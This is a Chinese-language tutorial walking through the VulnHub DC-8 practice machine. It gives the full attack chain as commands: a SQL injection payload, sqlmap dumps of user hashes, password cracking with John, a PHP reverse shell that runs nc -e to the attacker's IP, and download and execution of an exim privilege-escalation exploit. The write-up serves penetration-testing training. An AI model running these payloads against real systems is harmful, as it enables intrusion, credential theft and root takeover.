DC-8靶机渗透测试详细教程
DC-8
DC-8下载:https://download.vulnhub.com/dc/DC-8.zip.torrent
攻击者kali:192.168.1.11
受害者DC-8:192.168.1.8
使用arp-scan -l 扫描出DC-8的IP地址
使用nmap扫描
nmap -sS -A -p- 192.168.1.8
得到22和80端口
进入到web界面
没有具体的重要信息
当点击旁边Details下面的内容的时候发现rul好像有sql注入
尝试手工注入
http://192.168.1.8/?nid=1%20and%20updatexml(1,concat(0x7e,database()),1)#
有注入漏洞
使用sqlmap注入
顺便温习一下sqlmap工具注入使用
sqlmap -u http://192.168.1.8/?nid=1 -–dbs 查看当前数据库
和手工注入一样显示的数据库是 d7db
sqlmap -u http://192.168.1.8/?nid=1 -D d7db --tables 爆出数据库的表
有users表肯定直接爆这个表
爆出 字段
sqlmap -u http://192.168.1.8/?nid=1 -D d7db -T users –dump
得到admin和john账号的hash值
那么接下来尝试使用john来爆一下这两个账号的hash值
john 是一款大受欢迎的、免费的开源软件、基于字典的密码破解工具。用于在已知密文的情况下尝试破解出明文的破解密码软件,支持目前大多数的加密算法,如 DES 、 MD4 、 MD5 等。 John 支持字典破解方式和暴力破解方式。它支持多种不同类型的系统架构,包括 Unix 、 Linux 、 Windows 、 DOS 模式、 BeOS 和 OpenVMS ,主要目的是破解不够牢固的 Unix/Linux 系统密码
在桌面创建一个dc8.txt的文本将两hash值写入
使用john命令爆
john --wordlist=/usr/share/john/password.lst --rules dc8.txt
得出了一个 turtle ,还有一个半天没出,估计很久
先下一步,扫描一下登录的目录
使用dirb目录扫描工具扫
最后的到的目录是/user
尝试使用admin和john登录
john登录成功
经过一番折腾后发现有可以写php代码的地方
来到这里将shell反弹代码写进去
<p>demon</p>
<?php
system("nc -e /bin/sh 192.168.1.11 4444");
?>
一定要先选PHP然在写代码进去
并且选择php
然后kali开启监听
web页面往下滑找到保存按钮
显示保存成功
点击VIEW
在这个界面填好内容,点击按钮提交
kali接收到反弹
开启交互
python -c 'import pty;pty.spawn("/bin/bash")'
尝试提权
find / -perm -u=s -type f 2>/dev/null
exim4 --version
查看版本是4.89的
漏洞库搜索一下
searchsploit exim 4
直接使用这个4.87 -4.96
cat /usr/share/exploitdb/exploits/linux/local/46996.sh
查看一下脚本
明天写脚本解释
将脚本复制到桌面,命名为DC8shell.sh
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /root/桌面/DC8shell.sh
在使用vim打开
vim DC8shell.sh
到这里按键盘esc
然后按键盘shift+:
输入set ff=unix
回车,然后保存退出
使用python开启http服务
python -m http.server 8899
开启成功后可以在浏览器打开看看
然后选择刚刚复制的DC8shell.sh路径
回到控制终端
进入到tmp目录
cd /tmp
输入wget将地址粘贴进去,回车
下载成功
chmod 777 DC8shell.sh 给脚本权限
./DC8shell.sh -m netcat 执行脚本
拿到root权限
进入到root目录下拿到flag
DC-8总结
sql手工注入判断是否有sql注入漏洞
sqlmap工具注入使用,得到网站管理员的hash值
john对hash值的爆破使用
dirb目录扫描得到admin登录地址
找到可执行php代码的漏洞地方
使用php代码将shell反弹
<p>demon</p>
<?php
system("nc -e /bin/sh 192.168.1.11 4444");
?>
打开交互模式python -c 'import pty;pty.spawn("/bin/bash")'
尝试提权find / -perm -u=s -type f 2>/dev/null
发现exim4
查看exim4版本号
kali漏洞库查找searchsploit exim 4
查看漏洞脚本并且使用提权
DC-8靶机渗透测试详细教程相关推荐
- DC-5靶机渗透测试详细教程
DC-5 DC-5下载:https://download.vulnhub.com/dc/DC-5.zip.torrent 攻击者kali:192.168.1.9 受害者DC-5:192.168.1.8 ...
- DC-9靶机渗透测试详细教程
DC-9 DC-9下载:https://download.vulnhub.com/dc/DC-9.zip.torrent 攻击者kali:192.168.1.11 受害者DC-9:192.168.1. ...
- DC-2靶机渗透测试流程
目录 一.DC-2靶机搭建 二.收集信息. 三.访问80端口,发现超时. 1.修改hosts文件 2.访问http://dc-2成功. 四.目录扫描,拿到重要信息. 1.使用kali自带工具dirb ...
- DC-3靶机渗透测试
DC-3靶机渗透测试 环境搭建 kali-Linux(VMware) DC-3(VMware)靶机下载链接:https : //download.vulnhub.com/dc/DC-3-2.zip 这 ...
- 靶机渗透测试(unknowndevice64: 1)
靶机渗透测试(unknowndevice64: 1): Vulnhub靶机 unknowndevice64: 1 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访 ...
- Android渗透测试Android渗透测试入门教程大学霸
Android渗透测试Android渗透测试入门教程大学霸 第1章 Android渗透测试 Android是一种基于Linux的自由及开放源代码的操作系统,主要用于移动设备,如智能手机.平板等.目前 ...
- 【2023年最新版】渗透测试入门教程,手把手带你进阶渗透测试工程师,学完即可就业
前言 学习网络渗透技术是一件靠兴趣驱动的事情,只有强烈热爱一件事才能持之以恒的去做,对于那些三分钟热度的人来说还是劝你放弃吧,因为网络渗透技术自学需要很多方面的知识,没耐心是无法学会的. 当然除了有想 ...
- ProE野火4.0+vs2005 Pro/Toolkit 二次开发测试详细教程
ProE野火4.0+vs2005 Pro/Toolkit 二次开发测试详细教程 2011-04-09 23:02 536人阅读 评论(0) 收藏 举报 Pro/Toolkit可以帮助我们开发出自己需要 ...
- 靶机渗透测试(covfefe)
靶机渗透测试(covfefe) Vulnhub靶机 covfefe 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机. 靶机难度:(Intermediate ...
最新文章
- css之align 与 valign 的用法比较
- EXT学习经验分享:深刻理解EXT与服务器端的交互
- 《从零开始学keras之神经风格迁移
- 数值计算方法(七)——两种消去法求解线性方程组
- 从事Web前端开发,必须要知道的这些框架
- Ubuntu 截图编辑_编辑截图工具
- 2017第25届春季中西部(重庆)医疗器械展览会会刊(参展商名录)
- 数据结构实验之二叉树二:遍历二叉树(中序后序遍历)
- Photoshop抠图(运用背景橡皮擦工具进行抠图)
- 公共教室计算机安全调查报告论文,计算机实习调查报告.docx
- 年薪5w和50w的职场人思考力有什么区别
- Competition2:HRZ学英语
- ICM TSCC视频格式的播放
- 电信资费七宗罪,终端的故事
- 方框滤波opencv-python
- NSSCTF Round#4 Web WP
- PL/0 语言简介、PL/0 文法
- Springboot美食汇开放平台8ob70计算机毕业设计-课程设计-期末作业-毕设程序代做
- 【考研经历】二战终于上岸了,还得继续努力
- 医院AI智能随访电话机器人-北京联络加Loojion自主研发